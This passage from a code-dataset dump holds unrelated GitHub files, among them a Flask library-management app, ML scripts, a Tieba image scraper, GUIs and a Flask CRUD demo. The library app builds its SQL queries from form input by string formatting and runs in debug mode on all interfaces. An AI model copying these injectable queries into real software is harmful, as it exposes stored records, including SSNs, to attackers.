pass","repo_name":"MiguelBackAtItAgain/PryAnalisisVisualizacionPublic","sub_path":"extract/extract_calificacion_sc.py","file_name":"extract_calificacion_sc.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43980573051","text":"def solution(data):\n result = True\n sum = 0\n\n if '0' not in data:\n print(-1)\n return -1\n\n data = list(data)\n\n data.sort(reverse=True)\n\n data = ''.join(s for s in data)\n data = int(data)\n\n if data % 3 != 0:\n print(-1)\n return -1\n else:\n print(data)\n return data\n\n\nN = 
input()\nsolution(N)\n","repo_name":"pickac4rd/boj","sub_path":"string/9251.py","file_name":"9251.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12802407953","text":"from datetime import timedelta as td\nfrom datetime import datetime as dt\nfrom flask import *\nimport Connection\nimport Search\n\napp = Flask(__name__,\n static_folder=\"./static\",\n template_folder=\"./templates\")\n\n\n\ndef books_borrowed(cardid):\n connection = Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\"select * from BOOK_LOANS where Card_id='{0}' and date_in is null\".format(cardid))\n isbns = [x[0] for x in cursor.fetchall()]\n connection.commit()\n connection.close()\n count = len(isbns)\n return isbns\n\n\ndef valid_cardid(cardid):\n connection = Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\"select * from BORROWER where Card_id='{0}'\".format(cardid))\n ids = cursor.fetchall()\n count = len(ids)\n connection.close()\n return bool(count)\n\n@app.route(\"/updatefines\")\ndef update_fines():\n connection = Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\"DELETE from FINES where Paid=0\")\n cursor.execute(\"select * from BOOK_LOANS;\")\n loans = cursor.fetchall()\n for loan in loans:\n lid, isbn, cid, dateout, datedue, datein = loan\n datedue = dt.strptime(str(datedue), \"%Y%m%d\")\n if datein == None:\n datein = dt.now()\n else:\n datein = dt.strptime(str(datein), '%Y%m%d')\n\n diff = datein - datedue\n diff = diff.days\n\n if diff > 0:\n fine = diff * .25\n query = \"INSERT IGNORE INTO FINES (Loan_id, Fine_amt, Paid) values ('{}','{}','{}')\".format(lid,\n fine,\n '0')\n cursor.execute(query)\n\n connection.commit()\n connection.close()\n return render_template(\"checkout_s.html\",\n msg=\"Updated\")\n\n\ndef checkout_book(isbn, cardid):\n connection = Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n dateout = dt.now()\n datedue = dateout + td(days=14)\n dateout = dateout.strftime(\"%Y%m%d\")\n datedue = datedue.strftime(\"%Y%m%d\")\n cursor.execute(\n \"\"\"INSERT INTO BOOK_LOANS (Isbn, Card_id, Date_out, Due_date) values ('{}','{}','{}','{}')\"\"\".format(isbn,\n cardid,\n dateout,\n datedue))\n connection.commit()\n connection.close()\n\n\n@app.route(\"/\")\ndef main():\n return render_template(\"home.html\")\n\n\n\n@app.route(\"/results\", methods=[\"GET\", \"POST\"])\ndef results():\n form = request.form\n search = form.get('search')\n t = Search.search_books(search=search)\n if t:\n return render_template(\"results.html\",\n books=t)\n else:\n return render_template(\"checkout_s.html\",\n msg=\"No matching results found\")\n\n\n@app.route(\"/checkin\", methods=[\"GET\", \"POST\"])\ndef checkin():\n form = request.form\n isbn = form.get('isbn')\n datein = form.get('datein').replace('-', '')\n\n connection = Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\"update BOOK_LOANS SET Date_in='{0}' where Isbn='{1}' and Date_in is NULL\".format(datein, isbn))\n connection.commit()\n connection.close()\n update_fines()\n return render_template(\"checkout_s.html\",\n msg=\"Checkin successful!\")\n\n\n@app.route(\"/fetchfines\")\ndef fetchfines():\n update_fines()\n connection = Connection.get_connection()\n cursor = 
connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\n \"select B.Card_id, sum(F.Fine_amt) from BOOK_LOANS as B join (select Loan_id,Fine_amt from FINES where Paid=0) as F where F.Loan_id=B.Loan_id group by B.Card_id;\")\n fines = [(x, str(y) + \" USD\") for x, y in cursor.fetchall()]\n connection.commit()\n connection.close()\n if (len(fines) == 0):\n return render_template(\"checkout_s.html\",\n msg=\"All dues settled!\")\n else:\n return render_template(\"fines.html\",\n fines=fines)\n\n\n@app.route(\"/payfine\", methods=[\"GET\", \"POST\"])\ndef payfine():\n form = request.form\n cid = form.get('cid')\n connection = Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\"select Loan_id from BOOK_LOANS where Card_id='{}' and Date_in is not NULL;\".format(cid))\n loans = [x[0] for x in cursor.fetchall()]\n\n for loan in loans:\n query = \"update FINES set Paid=1 where Loan_id='{}';\".format(loan)\n cursor.execute(query)\n\n cursor.execute(\n \"select b.Loan_id from BOOK_LOANS b join FINES f on b.loan_id = f.loan_id where b.Card_id='{}' and b.Date_in is NULL and f.paid = 0;\".format(\n cid))\n loans = [x[0] for x in cursor.fetchall()]\n connection.commit()\n connection.close()\n if (not len(loans) == 0):\n return render_template(\"checkout_s.html\",\n msg=\"Payment updated only for books returned. The user with cardid \" + cid + \" has fines related to unreturned books.Books should be checked in first, to pay fine.\")\n else:\n return render_template(\"checkout_s.html\",\n msg=\"Payment successful!\")\n\n\n@app.route(\"/checkout\", methods=[\"GET\", \"POST\"])\ndef checkout():\n form = request.form\n isbn = form.get('isbn')\n cardid = form.get('cardid')\n name = form.get('name')\n is_empty, t = Search.search_booksc(isbn=isbn, cardid=cardid, name=name)\n\n if ((not t) or is_empty):\n if is_empty:\n return render_template(\"checkout_f.html\",\n msg=\"No input is entered,enter atleast one search criteria!\")\n else:\n return render_template(\"checkout_s.html\",\n msg=\"No matching results found\")\n\n else:\n return render_template(\"results_checkin.html\",\n books=t)\n\n\n@app.route(\"/checkoutstatus\", methods=[\"GET\", \"POST\"])\ndef checkoutstatus():\n form = request.form\n isbn = form.get('isbn')\n cardid = form.get('cardid')\n if not valid_cardid(cardid):\n msg = \"Invalid card_id - \" + cardid\n return render_template(\"checkout_f.html\",\n msg=msg)\n\n if len(books_borrowed(cardid)) >= 3:\n msg = \"The card holder already checked out his quota of 3 books\"\n return render_template(\"checkout_f.html\",\n msg=msg)\n book =Search.book_details([isbn])[0]\n if book[\"status\"] == \"Checked out\":\n msg = \"This book has already been checked out\"\n return render_template(\"checkout_f.html\",\n msg=msg)\n\n checkout_book(isbn, cardid)\n\n return render_template(\"checkout_s.html\",\n msg=\"Checkout successful!\")\n\n\ndef isnewssn(ssn):\n connection =Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\"select * from BORROWER where ssn='{0}'\".format(ssn))\n ids = cursor.fetchall()\n count = len(ids)\n connection.close()\n return not bool(count)\n\n\n@app.route(\"/addborrower\", methods=[\"GET\", \"POST\"])\ndef addborrower():\n form = request.form\n name = form.get('name')\n ssn = form.get('ssn')\n phone = form.get('phone')\n street = form.get('street')\n city = form.get('city')\n state = form.get('state')\n address = street + ', ' + city + ', ' + state\n 
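# truncate to 65/48 characters, presumably to fit the BORROWER table's column widths\n    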
address = address[:65]\n name = name[:48]\n\n if not isnewssn(ssn):\n return render_template(\"checkout_f.html\",\n msg=\"SSN already exists in db\")\n\n if len(phone) != len(\"2147483647\"):\n return render_template(\"checkout_f.html\",\n msg=\"Invalid phone number.\")\n\n connection = Connection.get_connection()\n cursor = connection.cursor()\n cursor.execute(\"use library\")\n cursor.execute(\n \"\"\"INSERT INTO BORROWER (Ssn,Bname,Address,Phone) values ('{}','{}','{}','{}')\"\"\".format(ssn, name, address,\n phone))\n connection.commit()\n connection.close()\n return render_template(\"checkout_s.html\",\n msg=\"Add successful!\")\n\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', debug=True)","repo_name":"jaggiaman/Library_Management_System","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":8949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8659393691","text":"from torch.utils.data import Dataset\nimport torch\nfrom torch.utils.data import Dataset, IterableDataset, DataLoader\nimport scipy.io as sci\nimport scipy as sp\nimport random\nimport numpy as np\nimport math\nimport os\n\nclass RecData(object):\n def __init__(self, dir, file_name):\n file_name = file_name + 'data.mat'\n self.file_name = os.path.join(dir, file_name)\n\n def get_data(self,ratio):\n mat = self.load_file(file_name=self.file_name)\n train_mat, test_mat = self.split_matrix(mat, ratio)\n return train_mat, test_mat\n \n def load_file(self,file_name=''):\n if file_name.endswith('.mat'):\n return sci.loadmat(file_name)['data']\n else:\n raise ValueError('not supported file type')\n\n def split_matrix(self, mat, ratio=0.8):\n mat = mat.tocsr() #按行读取,即每一行为一个用户\n m,n = mat.shape\n train_data_indices = []\n train_indptr = [0] * (m+1)\n test_data_indices = []\n test_indptr = [0] * (m+1)\n for i in range(m):\n row = [(mat.indices[j], mat.data[j]) for j in range(mat.indptr[i], mat.indptr[i+1])]\n train_idx = random.sample(range(len(row)), round(ratio * len(row)))\n train_binary_idx = np.full(len(row), False)\n train_binary_idx[train_idx] = True\n test_idx = (~train_binary_idx).nonzero()[0]\n for idx in train_idx:\n train_data_indices.append(row[idx]) \n train_indptr[i+1] = len(train_data_indices)\n for idx in test_idx:\n test_data_indices.append(row[idx])\n test_indptr[i+1] = len(test_data_indices)\n\n [train_indices, train_data] = zip(*train_data_indices)\n [test_indices, test_data] = zip(*test_data_indices)\n\n train_mat = sp.sparse.csr_matrix((train_data, train_indices, train_indptr), (m,n))\n test_mat = sp.sparse.csr_matrix((test_data, test_indices, test_indptr), (m,n))\n return train_mat, test_mat\n\n\n\nclass UserItemData(Dataset):\n def __init__(self, train_mat, train_flag=True):\n super(UserItemData, self).__init__()\n self.train = train_mat.tocoo()\n \n def __len__(self):\n # return self.train.shape[0]\n return self.train.nnz\n \n def __getitem__(self, idx):\n return self.train.row[idx].astype(np.int), self.train.col[idx].astype(np.int)","repo_name":"HERECJ/AdaSIR","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":2396,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"12506959726","text":"# !/usr/bin/python3\n# -*- coding:utf-8 -*- \n# author: Ming Luo\n# time: 2020/7/28 10:29\nimport threading\nimport time\nimport queue\n\nfrom lxml import etree\n\nfrom .file_download import DownLoadExecutioner, 
file_download\n\n\nclass XiaoHua:\n    def __init__(self, init_url):\n        self.init_url = init_url\n        self.download_executioner = DownLoadExecutioner()\n\n    def start(self):\n        self.download_executioner.start()  # 初始的queue没有值为什么直接运行这行,并且程序能执行\n        self.download_img(self.init_url)\n\n    def download_img(self, url):\n        html_text = file_download(url, type_='text')  # 下载页面\n        html = etree.HTML(html_text)\n        img_urls = html.xpath(\"//a[contains(@class,'thumbnail')]/img/@bpic\")  # 查找该页面所有的图片链接\n        self.download_executioner.put_task(img_urls)  # 将查找到的图片链接放入队列queue中\n\n        # 获取下一页的链接\n        next_page = html.xpath(\"//div[@id='frs_list_pager']/a[contains(@class,'next')]/@href\")\n        next_page = \"http:\" + next_page[0]  # 得到下一个页面的链接\n        self.download_img(next_page)  # 循环重复进入下一页操作\n\n\nif __name__ == '__main__':\n    x = XiaoHua(\"http://tieba.baidu.com/f?kw=校花&ie=utf-8\")\n    x.start()\n\n# 最多存入10个\nq = queue.Queue(maxsize=10)\n\n\ndef producer(name):\n    count = 1\n    while True:\n        # 生产一块骨头\n        q.put(\"骨头 %s\" % count)\n        print(\"%s生产了骨头%s\" % (name, count))\n        count += 1\n        time.sleep(0.3)\n\n\ndef consumer(name):\n    while True:\n        print(\"%s 取到[%s] 并且吃了它\" % (name, q.get()))\n        time.sleep(1)\n        # 告知这个任务执行完了\n        q.task_done()\n\n\n# 生成线程\np = threading.Thread(target=producer, args=(\"德国骨科\",))\nc = threading.Thread(target=consumer, args=(\"陈狗二\",))\nd = threading.Thread(target=consumer, args=(\"吕特黑\",))\n# 执行线程\np.start()\nc.start()\nd.start()\n","repo_name":"ming-log/python_threading","sub_path":"baidu_threading/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"34992572954","text":"try:\n    import Tkinter\n    import ttk\nexcept:\n    import tkinter as Tkinter\n\nfrom Tkinter import N, S, W, E\n\n\nclass PinFrame(object):\n    def __init__(self, root):\n        _frame = ttk.Frame(root, padding=\"3 3 12 12\")\n        _frame.columnconfigure(0, weight=1)\n        _frame.rowconfigure(0, weight=1)\n        self.frame = _frame\n\n\nclass VccGndFrame(PinFrame):\n    def __init__(self, root, voltage):\n        super(VccGndFrame, self).__init__(root)\n        label = \"VDD Pin %dV\" % voltage\n        ttk.Label(self.frame, text=label).grid(column=0, row=0, sticky=W)\n\n\nclass GpioFrame(PinFrame):\n    def __init__(self, root):\n        super(GpioFrame, self).__init__(root)\n\n        _state = Tkinter.StringVar()\n        _state.set(\"0\")\n        self.state = _state\n\n        _mode = Tkinter.StringVar()\n        _mode.set(\"OUTPUT\")\n        self.mode = _mode\n\n        self.box = ttk.Combobox(self.frame, textvariable=self.mode)\n        self.box['values'] = ('OUTPUT', 'INPUT')\n        self.box.current(0)\n        self.box.bind(\"<<ComboboxSelected>>\", self._change_mode)\n        self.box.grid(column=5, row=0, sticky=E)\n        # Implement on subclass\n        #self.pin_widget = None\n\n\n    def _change_mode(self, *args):\n        _mode = self.mode.get()\n        if _mode == \"INPUT\":\n            self.mode.set(\"INPUT\")\n            self.pin_widget.configure(state='normal')\n        else:\n            self.mode.set(\"OUTPUT\")\n            self.state.set(\"1\")\n            self.pin_widget.configure(state='disabled')\n\n\nclass DigitalGuiFrame(GpioFrame):\n    def __init__(self, root):\n        super(DigitalGuiFrame, self).__init__(root)\n        ttk.Label(self.frame, text=\"DigitalPin X\").grid(column=0, row=0, sticky=W)\n        self.pin_widget = Tkinter.Checkbutton(self.frame,\n                                              variable=self.state)\n        self.pin_widget.configure(state='disabled')\n        self.pin_widget.grid(column=2, row=0, sticky=\"\")\n        ttk.Label(self.frame, textvariable=self.state).grid(column=1, row=0, sticky=W)\n\n\nclass AnalogGuiFrame(GpioFrame):\n    def __init__(self, root):\n        super(AnalogGuiFrame, self).__init__(root)\n        
ttk.Label(self.frame, text=\"AnalogPin X\").grid(column=0, row=0, sticky=W)\n self.pin_widget = Tkinter.Scale(self.frame, from_=0, to=100,\n orient=Tkinter.HORIZONTAL)\n self.pin_widget.configure(state='disabled')\n self.pin_widget.grid(column=2, row=0, sticky=(W, E))\n\n\nclass pinGUIm(object):\n\n def __init__(self):\n self.root = Tkinter.Tk()\n self.root.title(\"pingo :: pinGUIm\")\n self.root.geometry(\"390x240\")\n\n vf = VccGndFrame(self.root, 5)\n df = DigitalGuiFrame(self.root)\n af = AnalogGuiFrame(self.root)\n\n df.frame.grid(column=0, row=0, sticky=(N, W, E, S), padx=15, pady=15)\n af.frame.grid(column=0, row=1, sticky=(N, W, E, S), padx=15, pady=0)\n vf.frame.grid(column=0, row=2, sticky=(N, W, E, S), padx=15, pady=15)\n\n\ngui = pinGUIm()\ngui.root.mainloop()\n","repo_name":"pingo-io/experiments","sub_path":"pinGUIm/digital-analog.py","file_name":"digital-analog.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6669926107","text":"import time\n\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom imblearn.over_sampling import RandomOverSampler\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\nfrom collections import Counter\n\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score, f1_score, confusion_matrix\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.multiclass import OneVsRestClassifier, OneVsOneClassifier\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.svm import SVC\n\n\n# additional downloads\n# nltk.download('stopwords')\n# nltk.download('punkt')\n# nltk.download('wordnet')\n# nltk.download('omw-1.4')\n\n\ndef nlp_cleaning(data, output_filename):\n english_stops = set(stopwords.words(\"english\"))\n wl = WordNetLemmatizer()\n new_col_stems = []\n for summary in data[\"summary\"]:\n print(\".\", end=\"\")\n tokens = word_tokenize(summary.lower()) # split into tokens\n letters_only = [token for token in tokens if token.isalpha()] # remove non-alpha\n no_stops = [token for token in letters_only if token not in english_stops] # remove stop words\n stems = [wl.lemmatize(token) for token in no_stops] # remove plural forms\n stems = [wl.lemmatize(token, 'v') for token in stems] # change verbs to base form\n new_col_stems.append(stems)\n data[\"clean\"] = new_col_stems\n data.to_csv(output_filename)\n\n\ndef string_to_list(s):\n s = s[1:len(s) - 1]\n tmp = s.split()\n ans = []\n for label in tmp:\n ans.append(label[1:len(label) - 2])\n return ans\n\n\ndef sum_counter(data):\n genre = set(data[\"genre\"])\n genre_dict = {g: [] for g in genre}\n genre_dict_counter = {}\n for _, row in data.iterrows():\n genre_dict[row[\"genre\"]].append(Counter(string_to_list(row[\"clean\"])))\n for key in genre_dict.keys():\n genre_dict_counter[key] = sum(genre_dict[key], Counter())\n return genre_dict_counter\n\n\ndef graph(data):\n plt.figure(figsize=(10, 10))\n g = sns.countplot(x=\"genre\", data=data)\n plt.xticks(rotation=45)\n fig = g.get_figure()\n fig.savefig(\"figs/distribution.png\")\n plt.show()\n\n\ndef words_dict_by_genre(data):\n dict = sum_counter(data)\n for key in dict.keys():\n print(key + \": \" + 
str(dict[key].most_common(10)))\n\n\ndef fit_best(X_train, X_test, y_train, y_test, c):\n model = OneVsRestClassifier(LogisticRegression(C=c))\n model.fit(X_train, y_train)\n pred = model.predict(X_test)\n ac = accuracy_score(pred, y_test)\n f1 = f1_score(pred, y_test, average=\"macro\")\n ans = [c, ac, f1]\n return ans\n\n\ndef fit(X_train, X_test, y_train, y_test, old_labels, classifier):\n ans = []\n models = [KNeighborsClassifier(), LogisticRegression(), MultinomialNB(), SVC()]\n name = str(classifier).split('.')[-1][:-2]\n graph, axes = plt.subplots(len(models) // 2, 2, figsize=(18, 12))\n graph.suptitle(name, size=24)\n graph.tight_layout(pad=5.0)\n\n for i, model in enumerate(models):\n model = classifier(model)\n start = time.process_time()\n model.fit(X_train, y_train)\n pred = model.predict(X_test)\n fin = time.process_time()\n ac = accuracy_score(pred, y_test)\n f1 = f1_score(pred, y_test, average=\"macro\")\n\n ans.append([str(model), ac, f1, (fin - start) * 1000])\n\n cfm = confusion_matrix(y_test, pred)\n\n plt.figure(figsize=(10, 10))\n fig = sns.heatmap(cfm / cfm.sum(axis=1)[:, None] * 100, annot=True, cmap='Greens', vmax=100)\n fig.set_title(str(model) + \"[%]\")\n fig.set_xlabel(\"Predicted\")\n fig.set_ylabel(\"Real\")\n plt.xticks(rotation=45)\n plt.yticks(rotation=45)\n fig.xaxis.set_ticklabels(old_labels)\n fig.yaxis.set_ticklabels(old_labels)\n fig = fig.get_figure()\n fig.savefig(\"figs/\" + str(model) + \".png\")\n fig = sns.heatmap(cfm / cfm.sum(axis=1)[:, None] * 100, ax=axes[i // 2, i % 2], annot=True, cmap='Greens',\n vmax=100)\n fig.tick_params(labelrotation=45)\n fig.xaxis.set_ticklabels(old_labels)\n fig.yaxis.set_ticklabels(old_labels)\n title = str(model).split('=')[1][:-3]\n fig.title.set_text(title)\n\n df = pd.DataFrame(ans, columns=[\"model\", \"accuracy\", \"F1 score\", \"time ms\"])\n graph.savefig(\"figs/\" + name+\".png\")\n return df\n\n\nif __name__ == '__main__':\n # This function was used mostly for tests, therefore it is quite messy.\n # For a proper evaluation I used the version in notebook\n\n # data = pd.read_csv(\"data/data.csv\", index_col=0)\n # print(data.head())\n # print(\"shape of the data frame \", data.shape)\n # print(\"does it contains missing values?\\n\", data.isna().any(), \"\\n_______\")\n # graph(data)\n # nlp_cleaning(data, \"data/out.csv\")\n data = pd.read_csv(\"data/out.csv\")\n # words_dict_by_genre(data)\n # print(data.head())\n encoder = LabelEncoder()\n data[\"genre\"] = encoder.fit_transform(data[\"genre\"])\n old_labels = dict(zip(encoder.classes_, range(len(encoder.classes_))))\n # X_data = TfidfVectorizer(max_df=0.95).fit_transform(data[\"clean\"])\n X_data = CountVectorizer().fit_transform(data[\"clean\"])\n X_resampled, y_resampled = RandomOverSampler(random_state=119).fit_resample(X_data, data[\"genre\"])\n # X_train, X_test, y_train, y_test = train_test_split(X_data, data[\"genre\"], test_size=0.25, random_state=79)\n # dist = Counter(y_test)\n # genre_distribution = np.array([dist[i] for i in range(len(dist))])\n # print(dist)\n # res = []\n # start = time.process_time()\n # for r in range(3):\n # X_train, X_test, y_train, y_test = train_test_split(X_data, data[\"genre\"], test_size=0.25, random_state=r*17+13)\n # for c in range(1,11):\n # print(r, \" \", c)\n # res.append(fit_best(X_train, X_test, y_train, y_test, c/10))\n # df = pd.DataFrame(res, columns=[\"reg. param.\", \"accuracy\", \"F1 score\"])\n # # df = df.groupby('reg. 
param.').mean()\n # fin = time.process_time()\n # print((fin - start))\n X_train, X_test, y_train, y_test = train_test_split(X_data, data[\"genre\"], test_size=0.25, random_state=79)\n print(\"___\")\n print(fit(X_train, X_test, y_train, y_test,old_labels, OneVsOneClassifier))\n print(\"___\")\n\n #df = fit(X_train, X_test, y_train, y_test, old_labels)\n # print(df)\n","repo_name":"KarolWes/book_genre_pred","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5341364770","text":"\"\"\"\nMaster script.\n\nThis script.\n\"\"\"\nimport sys\nfrom Modules.Qt import QtCore, QtGui, QtWidgets\nfrom General.Maya_Optimizer.UI import BaseInterface, BaseStatus, Base_Details_v004Qt5, InterfaceFunctions\nfrom General.Maya_Optimizer.Core.Steps import Modeling, Animation, Rigging, Shading, VFX, Lighting\n\nmodulos = [BaseInterface,BaseStatus,Base_Details_v004Qt5, InterfaceFunctions, \n Modeling, Animation, Rigging, Shading, VFX, Lighting]\n[reload (xi) for xi in modulos]\n\n\nclass MyApplication(QtWidgets.QMainWindow, BaseInterface.Ui_MainWindow):\n\n def __init__(self, parent=None):\n super(MyApplication, self).__init__(parent)\n self.setupUi(self)\n\n\nclass StatusApplication(QtWidgets.QMainWindow, BaseStatus.Ui_form_status):\n\n def __init__(self, parent=None):\n super(StatusApplication, self).__init__(parent)\n self.setupUi(self)\n\n\nclass DetailWindow(QtWidgets.QMainWindow, Base_Details_v004Qt5.Ui_win_details):\n\n def __init__(self, parent=None):\n super(DetailWindow, self).__init__(parent)\n self.setupUi(self)\n\nif __name__ != \"__main__\":\n mdl_ins = Modeling.ModelingControls()\n anim_ins = Animation.AnimationControls()\n rig_ins = Rigging.RiggingControls()\n shd_ins = Shading.ShadingControls()\n vfx_ins = VFX.VfxControls()\n lgt_ins = Lighting.LightingControls()\n\n CtrlObjects = {\n \"Modelling\" : mdl_ins,\n \"Animation\" : anim_ins,\n \"Rigging\" : rig_ins,\n \"Shading\" : shd_ins,\n \"Vfx\" : vfx_ins,\n \"Lighting\" : lgt_ins\n }\n\n if QtCore.QCoreApplication.instance() is not None:\n app = QtCore.QCoreApplication.instance()\n else:\n app = QtWidgets.QApplication(sys.argv)\n\n app.aboutToQuit.connect(app.quit)\n\n window = MyApplication()\n status_window = StatusApplication()\n details_window = DetailWindow()\n\n window.setWindowFlags(\n window.windowFlags() | QtCore.Qt.WindowStaysOnTopHint)\n\n details_window.setWindowFlags(\n details_window.windowFlags() | QtCore.Qt.WindowStaysOnTopHint)\n\n status_window.setWindowFlags(\n status_window.windowFlags() | QtCore.Qt.WindowStaysOnTopHint)\n\n interfaceMacho = InterfaceFunctions.InterfaceActions(\n window_interface=window, status_window=status_window,\n detail_window=details_window, ctrlObjects = CtrlObjects)\n\n window.show()\n\n try:\n sys.exit(app.exec_())\n except:\n \"\"\n","repo_name":"fidelm02/Maya_Optimizer","sub_path":"Optimizer_app.py","file_name":"Optimizer_app.py","file_ext":"py","file_size_in_byte":2412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38542859166","text":"from flask import Flask, request\nimport mysql.connector\nimport json\napp = Flask(__name__)\n\nconn = mysql.connector.connect(\n host=\"mariadb\",\n user=\"root\",\n password=\"root\",\n database=\"sqoin\"\n)\n\n\n\n\n@app.route('/')\ndef hello():\n return 'Hello, World!'\n\n@app.route('/article', methods=['GET', 'POST'])\ndef article():\n print(\"get 
article\")\n if request.method == 'POST':\n name = request.form['name']\n cursor = conn.cursor()\n cursor.execute(\"INSERT INTO article (name) VALUES (%s)\", (name,))\n conn.commit()\n return 'Article created with name: %s' % name\n else:\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM article\")\n articles = cursor.fetchall()\n return json.dumps(articles)\n\n@app.route('/article/', methods=['GET', 'PUT', 'DELETE'])\ndef article_id(id):\n cursor = conn.cursor()\n cursor.execute(\"SELECT * FROM article WHERE id=%s\", (id,))\n a = cursor.fetchone()\n if not a:\n return 'Article with id: %s not found' % id\n if request.method == 'PUT':\n name = request.form['name']\n cursor.execute(\"UPDATE article SET name=%s WHERE id=%s\", (name, id))\n conn.commit()\n return 'Article with id: %s updated' % id\n if request.method == 'DELETE':\n cursor.execute(\"DELETE FROM article WHERE id=%s\", (id,))\n conn.commit()\n return 'Article with id: %s deleted' % id\n return str(id) + ': ' + a[1]\n\nif __name__ == '__main__':\n app.run(port=8080, debug=True, host='0.0.0.0')\n\n","repo_name":"zdbrig/1hourtraining","sub_path":"python-mysql/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41797280280","text":"from tkinter import *\r\nfrom Projects.SUIGasProject.myutils import clear\r\nfrom Projects.SUIGasProject.ProjectRequirements import COLORS, FONT_STYLE, FONT_SIZE, BOLD\r\n\r\n\r\nclass LoginScreen:\r\n def __init__(self, root, frame=None, user=None, imgs=None) -> None:\r\n if frame is not None:\r\n frame.destroy()\r\n self.frame = Frame(root, bg=COLORS[\"LIGHT_BLUE\"])\r\n self.frame.pack(fill=BOTH, expand=True)\r\n\r\n txtlbl = [\"<<<\", \"login\", \"email\", \"password\", \"email\", \"password\", str(user) + '\\t' + \"LOGIN\"]\r\n self.buttons = []\r\n self.entries = []\r\n for i in range(len(txtlbl)):\r\n if i <= 1:\r\n btn = Button(self.frame, text=txtlbl[i], bg=COLORS[\"BLUE\"], fg=COLORS[\"LIGHT_BLUE\"], width=7, height=2)\r\n btn.pack()\r\n btn.place(x=(510 * i) + 5, y=(495 * i) + 5)\r\n self.buttons.append(btn)\r\n elif 1 < i < 4:\r\n lbl = Label(self.frame, text=txtlbl[i], font=(FONT_STYLE, FONT_SIZE[15], BOLD), bg=COLORS[\"LIGHT_BLUE\"],\r\n fg=COLORS[\"BLUE\"])\r\n lbl.pack()\r\n lbl.place(x=400, y=250 + (75 * (i - 1)))\r\n elif 3 < i < (len(txtlbl) - 1):\r\n entry = Entry(self.frame, width=20, font=(FONT_STYLE, FONT_SIZE[15]), bg=COLORS[\"BLUE\"])\r\n entry.insert(0, txtlbl[i])\r\n entry.pack()\r\n entry.place(x=550, y=250 + (75 * (i - 3)))\r\n entry.bind(\"\", lambda event, ent=entry: clear(event, ent))\r\n self.entries.append(entry)\r\n else:\r\n lbl = Label(self.frame, text=txtlbl[len(txtlbl) - 1], font=(FONT_STYLE, FONT_SIZE[15]),\r\n bg=COLORS[\"LIGHT_BLUE\"], fg=COLORS[\"BLUE\"])\r\n lbl.pack()\r\n lbl.place(x=450, y=100)\r\n img = [imgs[1], imgs[2]]\r\n y = 325\r\n for i in range(len(img)):\r\n lb = Label(self.frame, image=img[i], bg=COLORS[\"BLUE\"])\r\n lb.pack()\r\n lb.place(x=520, y=y)\r\n y = 400\r\n\r\n def destroy(self):\r\n self.frame.destroy()\r\n","repo_name":"pyuserAbdullah/old_sngpl","sub_path":"LoginWindow.py","file_name":"LoginWindow.py","file_ext":"py","file_size_in_byte":2160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"70356220945","text":"import tkinter as tk\nfrom tkinter import Menu, messagebox, ttk\nfrom pathlib import Path\nimport os\n\n\nrect_color = 
